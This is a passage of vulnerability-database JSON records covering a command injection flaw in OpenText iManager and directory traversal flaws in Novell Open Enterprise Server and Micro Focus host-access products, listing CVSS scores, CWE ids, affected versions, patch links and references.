              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-248 Command Injection"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-77",
                  "description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-78",
                  "description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2024-11-22T15:34:29.957Z",
            "orgId": "f81092c5-7f14-476d-80dc-24857f90be84",
            "shortName": "OpenText"
          },
          "references": [
            {
              "url": "https://www.netiq.com/documentation/imanager-32/pdfdoc/imanager326_patch3_releasenotes/imanager326_patch3_releasenotes.pdf"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Possible Command Injection in OpenText iManager",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f81092c5-7f14-476d-80dc-24857f90be84",
        "assignerShortName": "OpenText",
        "cveId": "CVE-2023-24467",
        "datePublished": "2024-11-22T15:34:29.957Z",
        "dateReserved": "2023-01-23T21:31:58.769Z",
        "dateUpdated": "2024-11-25T18:12:56.534Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    VAR-201701-0688

    Vulnerability from variot - Updated: 2025-04-20 23:16

    Remote Manager in Open Enterprise Server (OES) allows unauthenticated remote attackers to read any arbitrary file, via a specially crafted URL, that allows complete directory traversal and total information disclosure. This vulnerability is present on all versions of OES for linux, it applies to OES2015 SP1 before Maintenance Update 11080, OES2015 before Maintenance Update 11079, OES11 SP3 before Maintenance Update 11078, OES11 SP2 before Maintenance Update 11077). Novell Open Enterprise Server (OES) is an enterprise server from Novell, Inc., which provides network services, file and print services, and network management functions. Novell OpenEnterpriseServer has a directory traversal vulnerability that stems from a failure to fully validate user input. Information harvested may aid in launching further attacks

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0688",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "open enterprise server",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "novell",
            "version": "2.0"
          },
          {
            "model": "open enterprise server",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "novell",
            "version": "2015"
          },
          {
            "model": "open enterprise server",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "novell",
            "version": "11.0"
          },
          {
            "model": "open enterprise server (oes linux",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "novell",
            "version": "2015)2015"
          },
          {
            "model": "open enterprise server (oes linux",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "novell",
            "version": "2)2"
          },
          {
            "model": "open enterprise server (oes linux",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "novell",
            "version": "11)11"
          },
          {
            "model": "open enterprise server",
            "scope": null,
            "trust": 0.8,
            "vendor": "microfocus",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "db": "BID",
            "id": "95743"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5182"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:microfocus:open_enterprise_server",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Illinois Department of Innovation \u0026 Technology, Division of Information Security",
        "sources": [
          {
            "db": "BID",
            "id": "95743"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-5182",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-5182",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-01095",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2017-5182",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-5182",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-5182",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-01095",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201701-245",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5182"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Remote Manager in Open Enterprise Server (OES) allows unauthenticated remote attackers to read any arbitrary file, via a specially crafted URL, that allows complete directory traversal and total information disclosure. This vulnerability is present on all versions of OES for linux, it applies to OES2015 SP1 before Maintenance Update 11080, OES2015 before Maintenance Update 11079, OES11 SP3 before Maintenance Update 11078, OES11 SP2 before Maintenance Update 11077). Novell Open Enterprise Server (OES) is an enterprise server from Novell, Inc., which provides network services, file and print services, and network management functions. Novell OpenEnterpriseServer has a directory traversal vulnerability that stems from a failure to fully validate user input. Information harvested may aid in launching further attacks",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-5182"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "db": "BID",
            "id": "95743"
          }
        ],
        "trust": 2.43
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-5182",
            "trust": 3.3
          },
          {
            "db": "BID",
            "id": "95743",
            "trust": 2.5
          },
          {
            "db": "SECTRACK",
            "id": "1037689",
            "trust": 1.6
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "db": "BID",
            "id": "95743"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5182"
          }
        ]
      },
      "id": "VAR-201701-0688",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          }
        ],
        "trust": 0.06
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:16:21.510000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Micro Focus Open Enterprise Server directory traversal vulnerability CVE-2017-5182",
            "trust": 0.8,
            "url": "https://www.novell.com/support/kb/doc.php?id=7018503"
          },
          {
            "title": "NovellOpenEnterpriseServer directory traversal vulnerability patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/88791"
          },
          {
            "title": "Micro Focus OES Remote Manager Fixes for path traversal vulnerability",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=110354"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.8
          },
          {
            "problemtype": "CWE-200",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5182"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "http://www.securityfocus.com/bid/95743"
          },
          {
            "trust": 1.9,
            "url": "https://www.novell.com/support/kb/doc.php?id=7018503"
          },
          {
            "trust": 1.6,
            "url": "http://www.securitytracker.com/id/1037689"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5182"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5182"
          },
          {
            "trust": 0.3,
            "url": "http://www.novell.com/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "db": "BID",
            "id": "95743"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5182"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "db": "BID",
            "id": "95743"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-5182"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-02-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "date": "2017-01-20T00:00:00",
            "db": "BID",
            "id": "95743"
          },
          {
            "date": "2017-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "date": "2017-01-11T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          },
          {
            "date": "2017-01-23T15:59:00.137000",
            "db": "NVD",
            "id": "CVE-2017-5182"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-02-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-01095"
          },
          {
            "date": "2017-02-02T04:01:00",
            "db": "BID",
            "id": "95743"
          },
          {
            "date": "2017-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          },
          {
            "date": "2020-02-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-5182"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linux for  Open Enterprise Server of  Remote Manager Vulnerable to directory traversal",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-001356"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201701-245"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201611-0266

    Vulnerability from variot - Updated: 2025-04-13 23:33

    Administrative Server in Micro Focus Host Access Management and Security Server (MSS) and Reflection for the Web (RWeb) and Reflection Security Gateway (RSG) and Reflection ZFE (ZFE) allows remote unauthenticated attackers to read arbitrary files via a specially crafted URL that allows limited directory traversal. Applies to MSS 12.3 before 12.3.326 and MSS 12.2 before 12.2.342 and RSG 12.1 before 12.1.362 and RWeb 12.3 before 12.3.312 and RWeb 12.2 before 12.2.342 and RWeb 12.1 before 12.1.362 and ZFE 2.0.1 before 2.0.1.18 and ZFE 2.0.0 before 2.0.0.52 and ZFE 1.4.0 before 1.4.0.14. Authentication is not required to exploit this vulnerability.The specific flaw exists within the PassThru resource. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information under the context of the current process. Multiple Micro Focus Products are prone to an directory-traversal vulnerability. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to read arbitrary files in the context of the application. This may aid in further attacks. The following versions are affected: 12.3 prior to MSS 12.3.326, 12.2 prior to MSS 12.2.342; 12.1 prior to RSG 12.1.362; 12.3 prior to RWeb 12.3.312, 12.2 prior to RWeb 12.2.342, RWeb 12.1 before 12.1.362; ZFE 2.0.1.18 before 2.0.1, Reflection ZFE (ZFE) 2.0.0 before ZFE 2.0.0.52, ZFE 1.4.0 before 1.4.0.14

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "reflection zfe",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "microfocus",
            "version": "2.0.1.18"
          },
          {
            "_id": null,
            "model": "reflection zfe",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "microfocus",
            "version": "1.4.0.14"
          },
          {
            "_id": null,
            "model": "reflection zfe",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "microfocus",
            "version": "2.0.0.52"
          },
          {
            "_id": null,
            "model": "reflection security gateway",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "microfocus",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "host access management and security server",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "microfocus",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "microfocus",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "microfocus",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "host access management and security server",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "microfocus",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "microfocus",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "host access management and security server",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "host access management and security server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.2 build 342"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.3 build 312"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "2014 r2 12.1 build 362"
          },
          {
            "_id": null,
            "model": "reflection security gateway",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "2014 r2 12.1 build 362"
          },
          {
            "_id": null,
            "model": "reflection zfe",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "2.0.0"
          },
          {
            "_id": null,
            "model": "host access management and security server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.3 build 326"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "reflection zfe",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "1.4.0"
          },
          {
            "_id": null,
            "model": "host access management and security server",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "reflection for the web",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.2 build 342"
          },
          {
            "_id": null,
            "model": "reflection security gateway",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "reflection zfe",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "microfocus",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "host access management and security server",
            "scope": null,
            "trust": 0.7,
            "vendor": "attachmate",
            "version": null
          },
          {
            "_id": null,
            "model": "focus reflection zfe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "focus reflection zfe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "focus reflection zfe",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "focus reflection security gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "focus reflection for the web",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "focus reflection for the web",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "focus reflection for the web",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "focus host access management and security server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "focus host access management and security server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "focus reflection zfe",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "2.0.1.18"
          },
          {
            "_id": null,
            "model": "focus reflection zfe",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "2.0.0.52"
          },
          {
            "_id": null,
            "model": "focus reflection zfe",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "1.4.0.14"
          },
          {
            "_id": null,
            "model": "focus reflection security gateway build",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.1362"
          },
          {
            "_id": null,
            "model": "focus reflection for the web build",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.3312"
          },
          {
            "_id": null,
            "model": "focus reflection for the web build",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.2342"
          },
          {
            "_id": null,
            "model": "focus reflection for the web build",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.1362"
          },
          {
            "_id": null,
            "model": "focus host access management and security server build",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.3326"
          },
          {
            "_id": null,
            "model": "focus host access management and security server build",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "micro",
            "version": "12.2342"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-16-618"
          },
          {
            "db": "BID",
            "id": "94579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201611-648"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-5765"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:microfocus:host_access_management_and_security_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:microfocus:reflection_for_the_web",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:microfocus:reflection_security_gateway",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:microfocus:reflection_zfe",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-006045"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "rgod",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-16-618"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2016-5765",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2016-5765",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2016-5765",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "MEDIUM",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-94584",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2016-5765",
